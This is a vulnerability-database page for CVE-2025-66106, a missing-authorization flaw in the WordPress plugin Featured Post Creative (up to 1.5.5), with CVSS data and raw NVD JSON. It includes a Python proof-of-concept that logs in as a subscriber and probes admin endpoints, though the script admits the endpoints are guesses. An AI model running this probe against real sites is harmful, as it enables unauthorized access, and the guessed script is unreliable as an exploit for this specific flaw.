Security Vulnerability Report
中文
CVE-2025-66106 CVSS 4.3 MEDIUM

CVE-2025-66106

Published: 2025-11-21 13:15:52
Last Modified: 2026-04-27 18:16:36

Description

Missing Authorization vulnerability in Essential Plugin Featured Post Creative featured-post-creative allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Featured Post Creative: from n/a through <= 1.5.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Featured Post Creative <= 1.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66106 PoC - Missing Authorization in Featured Post Creative Plugin # Affected: Featured Post Creative Plugin <= 1.5.5 import requests import sys target = "http://target-wordpress-site.com" # Authenticate as low-privilege user (subscriber) session = requests.Session() # Login as subscriber user login_url = f"{target}/wp-login.php" login_data = { "log": "subscriber_username", "pwd": "subscriber_password", "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data) # Try to access admin-only plugin functionality (unauthorized access) # Replace action parameter based on actual vulnerable endpoint admin_actions = [ "/wp-admin/admin-ajax.php?action=featured_post_creative_admin_action", "/wp-json/wp/v2/featured-post-creative/settings", "/wp-admin/admin.php?page=featured-post-creative-settings" ] print("Testing CVE-2025-66106 - Missing Authorization") print("Target:", target) print("User role: subscriber (low privilege)") print("-" * 50) for action in admin_actions: url = f"{target}{action}" try: response = session.get(url, timeout=10) if response.status_code == 200 and "admin" in response.text.lower(): print(f"[VULNERABLE] {action}") print(f"Status: {response.status_code}") print("Response contains admin-level content!") else: print(f"[CHECK] {action} - Status: {response.status_code}") except Exception as e: print(f"[ERROR] {action} - {str(e)}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66106", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:51.793", "lastModified": "2026-04-27T18:16:35.863", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Essential Plugin Featured Post Creative featured-post-creative allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Featured Post Creative: from n/a through <= 1.5.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/featured-post-creative/vulnerability/wordpress-featured-post-creative-plugin-1-5-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}